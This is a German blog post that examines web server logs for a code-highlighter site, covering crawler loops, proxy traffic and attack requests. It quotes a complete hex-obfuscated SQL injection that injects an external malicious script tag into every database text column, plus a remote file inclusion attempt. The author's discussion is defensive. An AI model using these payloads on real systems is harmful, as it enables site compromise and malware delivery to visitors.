Was lernen wir aus diesem Eintrag: Google hat auf dem GeSHi-Bugtracker keinen Account, versucht es aber trotzdem. MSN hat hier den gleichen Fehler, ist aber nicht ganz so persistent wie Google, weshalb die Verschachtelung wesentlich geringer ausf\u00e4llt<\/p>\n
[16\/Nov\/2008:19:07:08 +0000] geshi.org:80 65.55.210.22 - - - HTTP\/1.1 GET \/var\/www\/html\/htdocs\/developers\/bugs\/login_page.php 200 200 4617 Req=\"GET \/developers\/bugs\/login_page.php?return=%2Fdevelopers%2Fbugs%2Flogin_page.php%3Freturn%3D%252Fdevelopers%252Fbugs%252Fview_all_bug_page.php%253Ffilter%253D77849 HTTP\/1.1\" Referer=\"-\" Agent=\"msnbot\/1.1 (+http:\/\/search.msn.com\/msnbot.htm)\" SVN=\"-\" SSL=\"- - -\"<\/pre>\nTrotzdem fragt man sich doch, ob Bots sowas nicht mitbekommen, dass es da nichts zu crawlen gibt, gerade weil hier durchaus recht gro\u00dfe Mengen von Traffic jeden Monat sinnlos anfallen. In den derzeitigen Regionen, wo ich mich Trafficm\u00e4\u00dfig bewege, kann mir das erstmal relativ egal sein – eine L\u00f6sung die Bot-Freundlicher sein d\u00fcrfte, hab ich aber schon.<\/p>\n
Bliebe die dritte Kategorie von Traffic, der durch Suchmaschinen erzeugt wird: Proxying von Suchanfragen, wie es h\u00e4ufig von Angreifern zum Hacken von Websites als Verschleierungstaktik angewendet wird, i.d.R. aber nicht viel bringt, da solche Dinge relativ einfach durch entsprechende Filter entweder komplett abgedichtet werden k\u00f6nnen oder aber gut mitprotokolliert werden k\u00f6nnen. Beide Varianten haben sowohl Vor- als auch Nachteile: W\u00e4hrend das Blocken von Proxy-basierten Requests Beispielsweise \u00fcber den X-Forward-For-Header recht erkannt und gefiltert werden kann, sperrt man damit gleichzeitig eine Reihe verschiedener Anonymisierungsnetzwerke aus, die durchaus ihre Berechtigung haben. Protokolliert man hingegen einfach nur typische Felder, die auf die Nutzung von Proxies hinweisen mit, so entf\u00e4llt dieser Schutz, vor offensichtlichen Proxies, daf\u00fcr bedarf es jedoch einer manuellen, nachtr\u00e4glichen Auswertung, ob bestimmte Proxies missbraucht werden und daher gesperrt werden sollten.<\/p>\n
Ein hoher Anteil an Eintr\u00e4gen mit Proxy-Servern deutet somit auf entweder anonym surfende User oder einen hohen Anteil Angreifer hin, die es auf den eigenen Server abgesehen haben.<\/p>\n
Best\u00e4rkt wird gerade die zweite These dann, wenn man Voreigent\u00fcmer einer Domain erf\u00e4hrt, dass die verwendeten Scripte „mal eben“ geschrieben wurden, „damit sie funktionieren“. Dementsprechend sieht dann auch der Log aus: Reihenweise Versuchte SQL-Injections und Remote Code Execution-Angriffe, die Versuchen in den Server einzudringen.<\/p>\n
Auch hier gibt es typische Vertreter:<\/p>\n
[07\/Sep\/2008:05:17:21 +0000] geshi.org:80 221.126.77.240 - - - HTTP\/1.1 GET \/var\/www\/html\/htdocs\/highlighter\/news.php 200 200 18233 Req=\"GET \/highlighter\/news.php?id=103';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP\/1.1\" Referer=\"-\" Agent=\"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy\/1; Foxy\/1)\" SVN=\"-\" SSL=\"- - -\"<\/pre>\nund<\/p>\n
[10\/Nov\/2008:06:08:29 +0000] geshi.org:80 89.218.85.18 - - - HTTP\/1.1 GET \/var\/www\/html\/htdocs\/highlighter\/converter.inc.php 404 404 227 Req=\"GET \/highlighter\/converter.inc.php?include_path=http:\/\/{removed}\/fx29id.txt?? HTTP\/1.1\" Referer=\"-\" Agent=\"Mozilla\/5.0\" SVN=\"-\" SSL=\"- - -\"<\/pre>\nwobei beide nicht zu verachten sind: Nicht nur musste ich etwas genauer ersterem Eintrag hinschauen, um ihn von Suchmaschinen-Kategorie 2 zu unterscheiden, sondern musste zudem auch noch ich einen Hex-Decoder hernehmen, um mir den zugeh\u00f6rigen SQL-Befehl anzuschauen, der es durchaus in die oberste Liga verschleierter C-Programme schaffen w\u00fcrde.<\/p>\n
Dagegen ist der zweite Angriff, der eine h\u00e4ufig bei PHP-Installationen mit aktiviertem Register_Globals anzutreffende L\u00fccke ausnutzt schon regelmrecht langweilig. Sorry, liebe Angreifer, aber gegen Sowas gibt es genug Abwehrma\u00dfnahmen, darunter neben sauberem Schreiben der Script auch eine korrekte Konfiguration seiner Laufzeit-Umgebung.<\/p>\n
Bliebe noch die Frage, was einem diese Angriffe zeigen. Hmmm, gute Frage. Wahrscheinliche mehrere Dinge: Ein Punkt d\u00fcrfte sicherlich sein, dass die Domain unter Angreifern bekannt ist als m\u00f6gliches Ziel, zum anderen aber, dass selbst nach \u00fcber 6 Monaten unter neuer Herrschaft, sich noch nicht herumgesprochen hat, dass die meisten alten L\u00fccken inzwischen abgedichtet sind.<\/p>\n
Auch wenn es immer recht nervig ist, wenn man einen Server reinigen darf, bei dem wieder einmal eine Sicherheitsl\u00fccke ausgenutzt wurde, so ist es doch immer wieder spannend, herauszufinden, wie dies geschehen ist. Wenn man sich da die immer gleichen Arten von Standard-Angriffen anschauen muss, so kann dies schnell zu Langeweile f\u00fchren. Bliebe die Frage, wann die Script-Kiddies und Angreifer, die das Internet immer so vollspammen entlich wieder anfangen uns Webmaster mit ihren Anfragen auf unsere Server zu unterhalten – ich wei\u00df es ehrlich gesagt nicht!<\/p>\n
![\"Flattr](\"http:\/\/blog.benny-baumann.de\/wp-content\/plugins\/flattr\/img\/flattr-badge-large.png\"){kind=icon}
<\/a><\/p>","protected":false},"excerpt":{"rendered":"